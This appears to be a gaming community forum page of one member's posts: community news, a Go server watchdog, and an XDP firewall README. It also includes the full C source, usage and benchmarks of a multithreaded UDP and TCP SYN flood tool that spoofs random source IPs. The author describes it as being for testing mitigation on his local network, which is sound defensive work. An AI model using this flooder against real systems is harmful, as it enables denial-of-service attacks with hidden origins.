Posts posted by Roy
-
-
- Popular Post
Hey everyone,
I just wanted to announce some changes to our CS:S Division. This is part one; part two will be released in the near future.
Unfortunately, I won't have time to manage the 24/7 Dust2 server because I'm busy with many other things within GFL at the moment and the server definitely deserves better than an inactive manager such as myself. Therefore, the following changes will be implemented:
- @Runda will be moving to primarily manage our 24/7 Dust2 server.
- @Dreae will be primarily managing our Surf RPG DM server.
- Dreae will be doing technical work within the CS:S division as a whole. He plans to make some pretty awesome plugins, such as Discord Integration, along with fixing any technical issues currently existing on the servers. If these work well within the CS:S division, they could spread to other divisions as well!
- Runda will still have access to Surf RPG DM and will implement changes from time to time when needed (this is okay with Dreae). However, Runda will primarily focus on 24/7 Dust2.
Thanks!
-
-
I'd like to mention this can be used for GFL's servers as well. I am going to ask one of our SMs if they would like it set up as a test. Once it's proven stable, we can start adding it to more servers. I've noticed our servers sometimes get hung and aren't restarted for hours. Thankfully, this should resolve that.
We'd set the IPs to our servers' internal IPs and have the program running on the machines hosting the game servers themselves. Although the servers' IPIP tunnels are inside a Docker container, you can still send A2S_INFO requests to them from the host. Since we cache the A2S_INFO response on our POP servers, an attack specifically targeting the A2S_INFO query won't be able to cause false positives in this program.
Thanks!
-
Hey everyone,
I just wanted to share my newest project! I decided to switch things up for one day and, instead of programming in C, program in Go (Golang). This Go tool sends A2S_INFO requests to servers specified inside a config file. If a server fails to respond to x amount of A2S_INFO requests, the tool will attempt to kill the server and start it again via the Pterodactyl API.
This is helpful for servers that are hung, meaning they technically didn't crash, but something is taking up so many resources that the server is unplayable or offline (most likely a poorly coded addon with an infinite loop).
I'd like to mention I'm still fairly new to Golang. There are probably improvements I can make, but the program ultimately works and I've tested it!
Here's the information!
Description
A tool programmed in Go to automatically restart 'hung' game servers/containers via the Pterodactyl API (version 0.7). This only supports game servers that respond to the A2S_INFO query (a Valve Master Server query).
Config File
The config file's default path is /etc/pterowatch/pterowatch.conf. It should be a JSON object including the API URL, token, and an array of servers to check against. The main options are the following:
- apiURL => The Pterodactyl API URL.
- token => The bearer token to use when sending HTTP POST requests to the Pterodactyl API.
- servers => An array of servers to check against (read below).
The servers array should contain the following members:
- enable => If true, this server will be scanned.
- ip => The IP to send A2S_INFO requests to.
- port => The port to send A2S_INFO requests to.
- uid => The server's Pterodactyl UID.
- scantime => How often to scan a game server/container in seconds.
- maxfails => The maximum number of A2S_INFO response failures before attempting to restart the game server/container.
- maxrestarts => The maximum number of restart attempts to make while waiting for A2S_INFO responses to start coming back successfully.
- restartint => When a game server/container is restarted, the program won't start scanning the server until x seconds later.
Configuration Example
Here's a configuration example in JSON:

{
    "apiURL": "https://panel.mydomain.com",
    "token": "12345",
    "servers": [
        {
            "enable": true,
            "ip": "172.20.0.10",
            "port": 27015,
            "uid": "testingUID",
            "scantime": 5,
            "maxfails": 5,
            "maxrestarts": 1,
            "restartint": 120
        },
        {
            "enable": true,
            "ip": "172.20.0.11",
            "port": 27015,
            "uid": "testingUID2",
            "scantime": 5,
            "maxfails": 10,
            "maxrestarts": 2,
            "restartint": 120
        }
    ]
}
Building
You may use git and go build to build this project and produce a binary. Example:

git clone https://github.com/gamemann/Pterodactyl-Game-Server-Watch.git
cd Pterodactyl-Game-Server-Watch/src
go build
Credits
- @Roy - Creator.
Thanks!
-
- Popular Post
Hey everyone,
I just wanted to say we've made another achievement! We've hit over 1000 active users across all of GFL's game servers at the same time!

This hasn't happened since 2015. Our all-time record is 1300 players on at the same time, but keep in mind that a TS3 server with 100+ users was being tracked at the time. Therefore, the actual record for players on at the same time across game servers alone is probably around 1200.
I just wanted to say thank you to everybody who has contributed to the community.
Our next record to beat is getting above 10,000 users on our official Discord server which I hope to achieve soon-ish once we fix the GMod Discord Integration addon!
I think it's amazing we continue to make these achievements many years later as well!
Thank you.
-
I was a dumb kid in 2011 messing around with Steam groups and made GFL as a joke. Went the opposite direction of how I expected it to go after creating the group though LOL. And I do not regret it!
-
Just an update on this: I've implemented rate-limiting filter options (packets per second/PPS and bytes per second/BPS) along with a blocktime filter option. The blocktime option blocks the source IP for x amount of seconds if a packet matches that specific filter. This is useful if you have the PPS and BPS filter options set very high; you'd want to set the blocktime value high as well, since exceeding those limits is obviously an attack from that source IP. It also technically blocks matched packets faster, since after the first match the program doesn't have to check each packet against the filters. Instead, it checks whether the source IP is in the blacklist BPF map, and if it is and the block time hasn't expired, it drops the packet immediately.
If you set the blocktime low on these specific filtering rules, packets will come through every x seconds depending on the blocktime value. You may also set blocktime to 0 if you want to block specific packet types, but not the source IP itself.
I'm still working to implement payload matching. However, BPF hasn't liked any of the methods I've tried so far. I'm going to post a thread on the XDP mailing list requesting assistance with this. If I'm able to implement this feature, I believe the software is golden at that point.
Thanks!
-
-
Hey everyone,
I just wanted to share another side (but big) project I've been working hard on recently. I decided to make an XDP firewall that reads filtering rules from a config file. For those that do not know, XDP is a hook in the NIC's driver. If the host's NIC driver supports XDP-native (support list), you can attach XDP programs to the hook directly inside the NIC driver. When blocking packets at this hook, XDP can drop packets over 10 times faster than IPTables! If your NIC doesn't support XDP-native, the program will still attempt to use XDP-generic, which isn't as fast but should be about the same speed as IPTables, assuming your NIC's driver has enough headroom so it doesn't need to do double copies. XDP is pretty good for blocking (D)DoS attacks.
Anyways, I will now copy the contents of the GitHub README to this thread.
XDP Firewall
Description
An XDP firewall designed to read filtering rules from a config file. This software only supports IPv4 and the protocols TCP, UDP, and ICMP at the moment. With that said, the program comes with accepted and blocked packet statistics, which can be disabled if needed.
Additionally, if the host's NIC doesn't support XDP-native, the program will attempt to attach via XDP-generic. The program tries XDP-native first, though.
Command Line Usage
The following command line arguments are supported:
- --config -c => Location to config file. Default => /etc/xdpfw/xdpfw.conf.
- --list -l => List all filtering rules scanned from config file.
- --help -h => Print help menu for command line options.
Configuration File Options
Main
- interface => The interface for the XDP program to attach to.
- updatetime => How often to update the config and filtering rules. Leaving this at 0 disables auto-updating.
- nostats => If true, no accepted/blocked packet statistics will be displayed in stdout.
Filters
Config option filters is an array. Each filter includes the following options:
- enabled => If true, this rule is enabled.
- action => What action to perform against the packet if matched. 0 = Block. 1 = Allow.
- srcip => The source IP to match (e.g. 10.50.0.3).
- dstip => The destination IP to match (e.g. 10.50.0.4).
- min_ttl => The minimum TTL (time to live) the packet has to match.
- max_ttl => The maximum TTL (time to live) the packet has to match.
- max_len => The maximum packet length the packet has to match. This includes the entire frame (ethernet header, IP header, L4 header, and data).
- min_len => The minimum packet length the packet has to match. This includes the entire frame (ethernet header, IP header, L4 header, and data).
- tos => The TOS (type of service) the packet has to match.
- payloadmatch => The payload (L4 data) the packet has to match. The format is in hexadecimal and each byte is separated by a space. An example includes: FF FF FF FF 59.
TCP Options
The config option tcpopts within a filter is an array including TCP options. There should only be one such array per filter. Options include:
- enabled => If true, check for TCP-specific matches.
- sport => The source port the packet must match.
- dport => The destination port the packet must match.
- urg => If true, the packet must have the URG flag set to match.
- ack => If true, the packet must have the ACK flag set to match.
- rst => If true, the packet must have the RST flag set to match.
- psh => If true, the packet must have the PSH flag set to match.
- syn => If true, the packet must have the SYN flag set to match.
- fin => If true, the packet must have the FIN flag set to match.
UDP Options
The config option udpopts within a filter is an array including UDP options. There should only be one such array per filter. Options include:
- enabled => If true, check for UDP-specific matches.
- sport => The source port the packet must match.
- dport => The destination port the packet must match.
ICMP Options
The config option icmpopts within a filter is an array including ICMP options. There should only be one such array per filter. Options include:
- enabled => If true, check for ICMP-specific matches.
- code => The ICMP code the packet must match.
- type => The ICMP type the packet must match.
Note - All options within a filter besides enabled and action are optional. This means you do not have to define them within your config.
Note - As of right now, the payloadmatch option does not work. I am planning to implement functionality for this soon. Unfortunately, BPF hasn't liked the matching methods I've used so far.
Configuration Example
Here's an example of a config:

interface = "ens18";
updatetime = 15;

filters = (
    {
        enabled = true,
        action = 0,
        udpopts = (
            {
                enabled = true,
                dport = 27015
            }
        )
    },
    {
        enabled = true,
        action = 1,
        tcpopts = (
            {
                enabled = true,
                syn = true,
                dport = 27015
            }
        )
    },
    {
        enabled = true,
        action = 0,
        icmpopts = (
            {
                enabled = true,
                code = 0
            }
        )
    },
    {
        enabled = true,
        action = 0,
        srcip = "10.50.0.4"
    }
);
Credits
@Roy - Creator.
Thanks!
-
I just wanted to provide an update. I made A LOT of changes to this project. You can check the commits here.
I added many new flags/command line options, including --internal (when set, the program spoofs the source address from the 10.0.0.0/8 private IPv4 range). I also added a --src argument that allows you to specify a single source IP. With that said, I've added --smac and --dmac for source and destination MAC addresses (e.g. --dmac 1A:3F:2E:4F:D3:F5).
Finally, I HIGHLY improved performance. Before these changes, single-threaded performance was actually faster than multi-threaded performance. It turns out I had bad practices in the thread handlers, including:
- I used rand(), which isn't a thread-safe function. This means all the threads would serialize on this function, and I was using it when calculating random ports, spoofing IPs, and generating random payloads. Obviously, this impacted performance quite a bit. Therefore, I started using rand_r(&seed) instead, which is a thread-safe function.
- I was using a lot of shared global variables, so I cut down on this quite a bit. The only shared variables I still modify are the packet count and total data count, since I'm not sure how to sync these using local variables. Changing the while loop from while(cont) to while(1) also highly increased performance, since it's no longer checking the shared cont variable every loop.
- Additionally, using the --verbose (or -v) flag highly decreases performance, because it performs an fprintf() for each packet (printing a string to stdout every packet, so of course throughput suffers). If you want to push out as much data as possible, do not use this flag.
I also added max packet counts and max time since I kept taking down my local network and had to keep rebooting my home server since I was too lazy to directly connect to it and stop the program while connected to the server directly.
With these changes, I was able to push 4 Gbps to my loopback interface. Now obviously, my NIC can't actually handle that much, but this is how much the program is capable of pushing out with my CPU speed. Here are some results (please look at the thread count):
One Thread
root@test02:/home/dev/pcktflood/src# ./flood --dev ens18 --dst 127.0.0.1 -p 33 --internal -t 1 --interval 0 --min 1400 --max 1400 --time 10 --dmac 1A:C4:DF:70:D8:A6
Launching against 127.0.0.1:33 (0 = random) from interface ens18. Thread count => 1 and Time => 0 micro seconds.
Finished in 10 seconds.
Packets Total => 465677. Packets Per Second => 46567.
Megabytes Total => 671. Megabytes Per Second => 67.
Megabits Total => 5372. Megabits Per Second => 537.
Two Threads
root@test02:/home/dev/pcktflood/src# ./flood --dev ens18 --dst 127.0.0.1 -p 33 --internal -t 2 --interval 0 --min 1400 --max 1400 --time 10 --dmac 1A:C4:DF:70:D8:A6
Launching against 127.0.0.1:33 (0 = random) from interface ens18. Thread count => 2 and Time => 0 micro seconds.
Finished in 10 seconds.
Packets Total => 1034995. Packets Per Second => 103499.
Megabytes Total => 1492. Megabytes Per Second => 149.
Megabits Total => 11939. Megabits Per Second => 1193.
Six Threads
root@test02:/home/dev/pcktflood/src# ./flood --dev ens18 --dst 127.0.0.1 -p 33 --internal -t 6 --interval 0 --min 1400 --max 1400 --time 10 --dmac 1A:C4:DF:70:D8:A6
Launching against 127.0.0.1:33 (0 = random) from interface ens18. Thread count => 6 and Time => 0 micro seconds.
Finished in 10 seconds.
Packets Total => 3116140. Packets Per Second => 311614.
Megabytes Total => 4496. Megabytes Per Second => 449.
Megabits Total => 35970. Megabits Per Second => 3597.
Twelve Threads (CPU count on VM)
root@test02:/home/dev/pcktflood/src# ./flood --dev ens18 --dst 127.0.0.1 -p 33 --internal -t 12 --interval 0 --min 1400 --max 1400 --time 10 --dmac 1A:C4:DF:70:D8:A6
Launching against 127.0.0.1:33 (0 = random) from interface ens18. Thread count => 12 and Time => 0 micro seconds.
Finished in 10 seconds.
Packets Total => 3591233. Packets Per Second => 359123.
Megabytes Total => 5243. Megabytes Per Second => 524.
Megabits Total => 41951. Megabits Per Second => 4195.
Twenty-Four Threads (same performance as twelve threads since that's my CPU count)
root@test02:/home/dev/pcktflood/src# ./flood --dev ens18 --dst 127.0.0.1 -p 33 --internal -t 24 --interval 0 --min 1400 --max 1400 --time 10 --dmac 1A:C4:DF:70:D8:A6
Launching against 127.0.0.1:33 (0 = random) from interface ens18. Thread count => 24 and Time => 0 micro seconds.
Finished in 10 seconds.
Packets Total => 3584189. Packets Per Second => 358418.
Megabytes Total => 5239. Megabytes Per Second => 523.
Megabits Total => 41918. Megabits Per Second => 4191.
As I said before, this was against the loopback interface. I didn't want to perform this against another home VM I have because it'd take down my network and I've done that too many times already, haha.
Thanks!
-
Hey everyone,
If you noticed our servers being randomly password-protected recently, or showing invalid information on HLSW or in the in-game server browser, this was due to a bug that should be resolved now. I applied a patch I implemented on Compressor V1 to our NYC POP a couple of weeks ago. It was supposed to spread traffic to the AF_XDP socket across all RX queues. This worked for our old Hivelocity POP because we had a dedicated NIC/machine with the same number of RX queues as CPUs. However, since our POP servers are virtualized, we didn't actually have the same RX queue count as CPU count, and I think this was the issue.
I told @Dreae to revert this pull request to Compressor V1, and I'm going to work on finding a way to get the actual RX queue count of a server instead of just the CPU count (you can have fewer RX queues than CPUs).
Thank you for understanding.
-
5 minutes ago, .tr0ns said:
it was just a vb.net virus that tricked wanna be xbox kids into downloading it to ddos their opponents! It was a big meme amungst the IT/infosec community.
https://knowyourmeme.com/photos/286458-9gag
That's great haha! Love seeing script kiddies tricked in that case.
-
3 hours ago, .tr0ns said:
you should contribute to the LOIC project!!!

I'd assume this is some sort of open-source (D)DoS tool? To be honest, my intention isn't to attack others haha. Instead, I'm doing a lot of pen-testing against my local network to learn how to block these types of attacks on our Anycast network. With Compressor V2, which @Dreae and I are working on, we'll be implementing our own (D)DoS filtering. Therefore, I'm trying to understand how attacks work and what I can do to mitigate them, etc.
In the TCP SYN flood case, I was messing with TCP SYN cookies, the TCP connection backlog queue, TCP timeouts, and more!
Thanks.
-
Latest source code of src/flood.c can be found here:
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <sys/sysinfo.h>
#include <netinet/in.h>
#include <net/if.h>
#include <linux/if.h>
#include <linux/if_ether.h>
#include <linux/ip.h>
#include <linux/tcp.h>
#include <linux/udp.h>
#include <linux/if_packet.h>
#include <arpa/inet.h>
#include <signal.h>
#include <sys/ioctl.h>
#include <inttypes.h>
#include <getopt.h>
#include <pthread.h>
#include <string.h>

#include "include/csum.h"

#define MAX_PCKT_LENGTH 0xFFFF

// Command line structure.
struct pcktinfo
{
    char *dIP;
    char *interface;
    uint16_t port;
    uint64_t time;
    uint16_t threads;
    uint16_t min;
    uint16_t max;
} pckt;

// Global variables.
uint8_t cont = 1;
int help = 0;
int tcp = 0;
int verbose = 0;
uint8_t dMAC[ETH_ALEN];
uint8_t sMAC[ETH_ALEN];

void signalHndl(int tmp)
{
    cont = 0;
}

void GetGatewayMAC()
{
    char cmd[] = "ip neigh | grep \"$(ip -4 route list 0/0|cut -d' ' -f3) \"|cut -d' ' -f5|tr '[a-f]' '[A-F]'";

    FILE *fp = popen(cmd, "r");

    if (fp != NULL)
    {
        char line[18];

        if (fgets(line, sizeof(line), fp) != NULL)
        {
            sscanf(line, "%hhx:%hhx:%hhx:%hhx:%hhx:%hhx", &dMAC[0], &dMAC[1], &dMAC[2], &dMAC[3], &dMAC[4], &dMAC[5]);
        }

        pclose(fp);
    }
}

uint16_t randNum(uint16_t min, uint16_t max)
{
    return (rand() % (max - min + 1)) + min;
}

void *threadHndl(void *data)
{
    // Create and zero out the sockaddr_ll struct.
    struct sockaddr_ll sin;
    memset(&sin, 0, sizeof(sin));

    // Fill out sockaddr_ll struct.
    sin.sll_family = PF_PACKET;
    sin.sll_ifindex = if_nametoindex(pckt.interface);
    sin.sll_protocol = htons(ETH_P_IP);
    sin.sll_halen = ETH_ALEN;

    // Initialize socket FD.
    int sockfd;

    // Attempt to create socket.
    if ((sockfd = socket(AF_PACKET, SOCK_RAW, IPPROTO_RAW)) < 0)
    {
        perror("socket");
        pthread_exit(NULL);
    }

    // Receive the interface's MAC address (the source MAC).
    struct ifreq ifr;
    strcpy(ifr.ifr_name, pckt.interface);

    // Attempt to get MAC address.
    if (ioctl(sockfd, SIOCGIFHWADDR, &ifr) != 0)
    {
        perror("ioctl");
        pthread_exit(NULL);
    }

    // Copy source MAC to necessary variables.
    memcpy(sMAC, ifr.ifr_addr.sa_data, ETH_ALEN);
    memcpy(sin.sll_addr, sMAC, ETH_ALEN);

    // Attempt to bind socket.
    if (bind(sockfd, (struct sockaddr *)&sin, sizeof(sin)) != 0)
    {
        perror("bind");
        pthread_exit(NULL);
    }

    // Loop.
    while (cont)
    {
        // Get source port (random).
        uint16_t srcPort = randNum(1024, 65535);

        // Get destination port.
        uint16_t dstPort;

        // Check if port is 0 (random).
        if (pckt.port == 0)
        {
            dstPort = randNum(10, 65535);
        }
        else
        {
            dstPort = pckt.port;
        }

        // Spoof source IP as any IP address.
        uint16_t tmp[4];
        char IP[32];

        tmp[0] = randNum(1, 254);
        tmp[1] = randNum(1, 254);
        tmp[2] = randNum(1, 254);
        tmp[3] = randNum(1, 254);

        sprintf(IP, "%d.%d.%d.%d", tmp[0], tmp[1], tmp[2], tmp[3]);

        // Initialize packet buffer.
        char buffer[MAX_PCKT_LENGTH];

        // Create ethernet header.
        struct ethhdr *eth = (struct ethhdr *)(buffer);

        // Fill out ethernet header.
        eth->h_proto = htons(ETH_P_IP);
        memcpy(eth->h_source, sMAC, ETH_ALEN);
        memcpy(eth->h_dest, dMAC, ETH_ALEN);

        // Create IP header.
        struct iphdr *iph = (struct iphdr *)(buffer + sizeof(struct ethhdr));

        // Fill out IP header.
        iph->ihl = 5;
        iph->version = 4;

        // Check for TCP.
        if (tcp)
        {
            iph->protocol = IPPROTO_TCP;
        }
        else
        {
            iph->protocol = IPPROTO_UDP;
        }

        iph->id = 0;
        iph->frag_off = 0;
        iph->saddr = inet_addr(IP);
        iph->daddr = inet_addr(pckt.dIP);
        iph->tos = 0x00;
        iph->ttl = 64;

        // Calculate payload length.
        uint16_t dataLen = randNum(pckt.min, pckt.max);

        // Initialize payload.
        uint16_t l4header = (iph->protocol == IPPROTO_TCP) ? sizeof(struct tcphdr) : sizeof(struct udphdr);
        unsigned char *data = (unsigned char *)(buffer + sizeof(struct ethhdr) + sizeof(struct iphdr) + l4header);

        // Fill out payload with random characters.
        for (uint16_t i = 0; i < dataLen; i++)
        {
            *data = rand() % 255;
            data++;
        }

        // Check protocol.
        if (iph->protocol == IPPROTO_TCP)
        {
            // Create TCP header.
            struct tcphdr *tcph = (struct tcphdr *)(buffer + sizeof(struct ethhdr) + sizeof(struct iphdr));

            // Fill out TCP header.
            tcph->doff = 5;
            tcph->source = htons(srcPort);
            tcph->dest = htons(dstPort);
            tcph->ack_seq = 0;
            tcph->seq = 0;

            // Set SYN flag to 1.
            tcph->syn = 1;

            // Calculate length and checksum of IP header.
            iph->tot_len = htons(sizeof(struct iphdr) + sizeof(struct tcphdr) + dataLen);
            iph->check = 0;
            iph->check = ip_fast_csum(iph, iph->ihl);

            // Calculate TCP header checksum.
            tcph->check = 0;
            tcph->check = csum_tcpudp_magic(iph->saddr, iph->daddr, sizeof(struct tcphdr) + dataLen, IPPROTO_TCP, csum_partial(tcph, sizeof(struct tcphdr) + dataLen, 0));
        }
        else
        {
            // Create UDP header.
            struct udphdr *udph = (struct udphdr *)(buffer + sizeof(struct ethhdr) + sizeof(struct iphdr));

            // Fill out UDP header.
            udph->source = htons(srcPort);
            udph->dest = htons(dstPort);
            udph->len = htons(sizeof(struct udphdr) + dataLen);

            // Calculate length and checksum of IP header.
            iph->tot_len = htons(sizeof(struct iphdr) + sizeof(struct udphdr) + dataLen);
            iph->check = 0;
            iph->check = ip_fast_csum(iph, iph->ihl);

            // Calculate UDP header checksum.
            udph->check = 0;
            udph->check = csum_tcpudp_magic(iph->saddr, iph->daddr, sizeof(struct udphdr) + dataLen, IPPROTO_UDP, csum_partial(udph, sizeof(struct udphdr) + dataLen, 0));
        }

        // How much data we've sent (signed so the error check below works).
        ssize_t sent;

        // Attempt to send data.
        if ((sent = sendto(sockfd, buffer, ntohs(iph->tot_len) + sizeof(struct ethhdr), 0, (struct sockaddr *)&sin, sizeof(sin))) < 0)
        {
            perror("send");
            continue;
        }

        // Verbose mode.
        if (verbose)
        {
            fprintf(stdout, "Sent %zd bytes to destination.\n", sent);
        }

        // Check if we should wait between packets.
        if (pckt.time > 0)
        {
            usleep(pckt.time);
        }
    }

    // Close socket.
    close(sockfd);

    pthread_exit(NULL);
}

// Command line options.
static struct option longoptions[] =
{
    {"dev", required_argument, NULL, 'i'},
    {"dst", required_argument, NULL, 'd'},
    {"port", required_argument, NULL, 'p'},
    {"interval", required_argument, NULL, 1},
    {"threads", required_argument, NULL, 't'},
    {"min", required_argument, NULL, 2},
    {"max", required_argument, NULL, 3},
    {"verbose", no_argument, &verbose, 'v'},
    {"tcp", no_argument, &tcp, 4},
    {"help", no_argument, &help, 'h'},
    {NULL, 0, NULL, 0}
};

void parse_command_line(int argc, char *argv[])
{
    int c;

    // Parse command line.
    while ((c = getopt_long(argc, argv, "i:d:t:vh", longoptions, NULL)) != -1)
    {
        switch (c)
        {
            case 'i':
                pckt.interface = optarg;
                break;

            case 'd':
                pckt.dIP = optarg;
                break;

            case 'p':
                pckt.port = atoi(optarg);
                break;

            case 1:
                pckt.time = strtoll(optarg, NULL, 10);
                break;

            case 't':
                pckt.threads = atoi(optarg);
                break;

            case 2:
                pckt.min = atoi(optarg);
                break;

            case 3:
                pckt.max = atoi(optarg);
                break;

            case 'v':
                verbose = 1;
                break;

            case 'h':
                help = 1;
                break;

            case '?':
                fprintf(stderr, "Missing argument.\n");
                break;
        }
    }
}

int main(int argc, char *argv[])
{
    // Set optional defaults.
    pckt.threads = get_nprocs();
    pckt.time = 1000000;
    pckt.port = 0;
    pckt.min = 0;
    pckt.max = 1200;

    // Parse the command line.
    parse_command_line(argc, argv);

    // Check if help flag is set. If so, print help information.
    if (help)
    {
        fprintf(stdout, "Usage for: %s:\n" \
            "--dev -i => Interface name to bind to.\n" \
            "--dst -d => Destination IP to send TCP packets to.\n" \
            "--port -p => Destination port (0 = random port).\n" \
            "--interval => Interval between sending packets in micro seconds.\n" \
            "--threads -t => Amount of threads to spawn (default is host's CPU count).\n" \
            "--verbose -v => Print how much data we sent each time.\n" \
            "--min => Minimum payload length.\n" \
            "--max => Maximum payload length.\n" \
            "--tcp => Send TCP packet with SYN flag set instead of UDP packet.\n" \
            "--help -h => Show help menu information.\n", argv[0]);

        exit(0);
    }

    // Check if interface argument was set.
    if (pckt.interface == NULL)
    {
        fprintf(stderr, "Missing --dev option.\n");
        exit(1);
    }

    // Check if destination IP argument was set.
    if (pckt.dIP == NULL)
    {
        fprintf(stderr, "Missing --dst option.\n");
        exit(1);
    }

    // Get destination MAC address (gateway MAC).
    GetGatewayMAC();

    // Print information.
    fprintf(stdout, "Launching against %s:%d (0 = random) from interface %s. Thread count => %d and Time => %" PRIu64 " micro seconds.\n", pckt.dIP, pckt.port, pckt.interface, pckt.threads, pckt.time);

    // Spawn each thread.
    for (uint16_t i = 0; i < pckt.threads; i++)
    {
        // Create pthread.
        pthread_t pid;

        if (pthread_create(&pid, NULL, threadHndl, NULL) != 0)
        {
            fprintf(stderr, "Error spawning thread %" PRIu16 "...\n", i);
        }
    }

    // Signal.
    signal(SIGINT, signalHndl);

    // Loop!
    while (cont)
    {
        sleep(1);
    }

    // Debug.
    fprintf(stdout, "Cleaning up...\n");

    // Wait a second for cleanup.
    sleep(1);

    // Exit program successfully.
    exit(0);
}
Thanks!
-
Hey everyone,
I just wanted to release my newest C project here. I've rewritten my UDP Sender program and added support for TCP SYN flooding. This also randomizes/spoofs the source IP and port each time a packet is sent. Therefore, it will come from a new IP each time. I made this program to test mitigating TCP-related attacks (such as the common SYN flood attack). I've been messing with TCP SYN cookies, the TCP backlog queue, TCP timeouts, and more to see how a flood affects the victim. I've been doing all of this testing on my local network.
Description
This is an improved version of my UDP Sender program. However, this program also supports TCP SYN floods. The source IP is completely randomized/spoofed each time a packet is sent.
Why Did I make This?
I've been learning how to mitigate TCP-related attacks recently and decided to make a TCP SYN flood tool. Since I was planning to rewrite my UDP Sender program anyways, I decided to create a program that does both UDP and TCP (SYN) floods.
Compiling
I used GCC to compile this program. You must add -lpthread at the end of the command when compiling via GCC.
Here's an example:
gcc -g src/flood.c -o src/flood -lpthread
Usage
Here's output from the --help flag that goes over the program's command line usage:
./flood --help
Usage for: ./flood:
--dev -i => Interface name to bind to.
--dst -d => Destination IP to send TCP packets to.
--port -p => Destination port (0 = random port).
--interval => Interval between sending packets in micro seconds.
--threads -t => Amount of threads to spawn (default is host's CPU count).
--verbose -v => Print how much data we sent each time.
--min => Minimum payload length.
--max => Maximum payload length.
--tcp => Send TCP packet with SYN flag set instead of UDP packet.
--help -h => Show help menu information.
Example:
./flood --dev ens18 --dst 10.50.0.4 --port 80 -t 1 --interval 100000 --tcp --min 1200 --max 1200 -v
Credits
- @Roy - Created the program.
Thanks!
-
2 minutes ago, Leks said:
@Roy was your senior quote seriously that? i cba with u LOL
Best quote of the class. Others in the class agreed!
EDIT
All these other people wrote long thought-out quotes and I'm over here quoting Spongebob rofl.
-
I have four pics to share. Two are from recently and the other two are from my Senior Year of High School (I went through my year book tonight). The pics aren't great, but YOLO.
Recent
This was when I was taking care of my colleague's dog. The dog is ADORABLE and reminds me a lot of the Black Lab I had at my parent's house. Just a lot more energetic!
This pic was a couple weeks ago! @braed thank you and Paul again for everything!
Senior Year
P.S. I have the best Senior Year quote and I think that basically describes me during Senior Year lmao!
Try to find me in the pic above
Hint -> I look dead as FUCK!
-
Updated to March of 2020. Considering we're at $10000 now, I'm going to guess we've made A LOT of money during April! I will look at that report soon.
EDIT
We've received $3000+ so far in April and sent ~$700 (we've saved a lot of money since we aren't paying as many overage fees).
Thanks!
-
- Popular Post
Hey everyone,
I made a status update for this, but I figured it's worth a thread since it's a pretty big accomplishment for GFL!

We have hit over $10000 as our balance for the first time ever. For those that do not know, this counter indicates how much money we have in our PayPal balance.
Back in 2016 (four years ago), we only had a balance of $200 - $500 and at one point owed $1000+. We nearly died at that time, and the fact that we're now at $10000+ shows how far the community has come.
I also want to mention that all money donated to GFL goes into GFL only. Therefore, we're going to be spending quite a bit once @Dreae and I complete Compressor V2 and we start to heavily expand our Anycast infrastructure.
I just wanted to thank all of our Supporters and VIPs for making this possible!
Thank you.
-
If you ever need help with programming or just want to talk, you know I'm here @JGuary551
-
I just wanted to provide a small update, Compressor V2 planning has started and the planning can be found here for those interested:
https://gitlab.com/srcds-compressor/compressor/-/issues
This is something I'm very excited about! I also wanted to say thank you to @Dreae for all the hard work he is putting into this!
Thanks!
-
For whatever reason, the AFK Manager sets a player's AFK status to true by default until they actually go AFK and come out of it. This messes up the AFKM_IsClientAFK native for us. Therefore, I had to comment out that part of the code for the CS:S BHop server for now.
I will be modifying the AFK Manager plugin later and rework it so it doesn't set the player's AFK status to true by default.
Thanks!
-
25 minutes ago, koen said:
Sounds technical but interesting (server manager here too XD). Thanks for all the hard work! Hope it all works out!
Thank you
I'm hoping it all works out as well! We should be able to get everything done besides Compressor V2 in the next couple of weeks. I have no ETA on Compressor V2 unfortunately since that's a pretty major project.
Thanks!
-
- Popular Post
Hey everyone,
I just wanted to provide an update on the technical side of GFL. We've been making a lot of progress recently and have exciting projects coming up! I will be covering these topics today.
ACL Rules Removal From New Hosting Provider
We've recently purchased a dedicated server from a new hosting provider. I've been wanting to go with this hosting provider for quite some time and finally decided to do so when our GS2990wx machine's hard drive got corrupted last weekend.
The one thing that I've been waiting on is hearing back from the hosting provider's DC on whether they can remove the ACL rules so that we can spoof outbound traffic as our Anycast IPv4 range. As of right now, all game server outbound traffic from the machine flows through the Chicago POP server, which results in bandwidth overage fees, additional latency, and more. Once the ACL rules are removed, we'll be able to use the TC BPF program I made and send outgoing traffic back to the client directly by spoofing the source IP as the Anycast network (along with removing the outer IP header, etc.). For a full list of benefits from this TC BPF program, please read this post here.
A couple of days ago, the DC told me this is possible. However, there is a one-time $35 fee, and I need to provide the following:
- The IPv4 range (92.119.148.0/24 in this case, obviously).
- An explanation on why I need these ACL rules removed for our IPv4 range.
- A signed authorization letter.
Considering this could save us $400+/m in bandwidth overage fees in the future, I feel the one-time $35.00 fee is worth it. I will compile all of this information once I hear back from the hosting provider regarding the requirements for the signed authorization letter.
Expansion With New Hosting Provider
So far, our new hosting provider has been awesome! I haven't seen any reports of our Rust Modded servers suffering from performance issues since moving to the new hosting provider. The machine has an Intel i9-9900K processor with 64 GB of RAM and 1 TB of NVMe storage, and it turbo-boosts to 4.6 - 4.8 GHz (all cores).
One unfortunate thing with the new hosting provider is that when the processor nears dangerous temperatures, it has to down-clock. I haven't seen this become an issue so far, and it seems this is something they'll be improving as well (better cooling and so on). The minimum speed I've seen is 4.6 GHz on all cores under high load, which is still pretty decent. It appears to be handling our servers without any issues anyways.
If things continue to go well, I plan to keep expanding with this hosting provider. If we do this, we will be dropping our machines with Nexril. Nexril has been a great hosting provider during our time with them and I've recommended them to many other server owners. The CEO (James) is very cool as well! However, their Intel i9-9900K machines are $249.00/m compared to our new hosting provider at $139.99/m.
I also plan to order the following two additional machines after proven stability and the ACL rules are removed allowing us to spoof out as our Anycast network:
- Intel i9-9900K with 64 GB of RAM and 1 TB NVMe storage -> This will host the rest of our game servers currently on Nexril.
- Intel i7-9700K with 32 GB of RAM and 500 GB NVMe storage (custom build) -> This will host our intense game servers such as our high-slot Rust servers. The Intel i7-9700K doesn't include hyper-threading, so it will run slightly cooler and may allow higher turbo-boost speeds (i.e. higher single-threaded performance, which is important for our intense servers).
Once I have an update on this topic specifically, I will let you know!
GS2990wx And GS3900X Machines
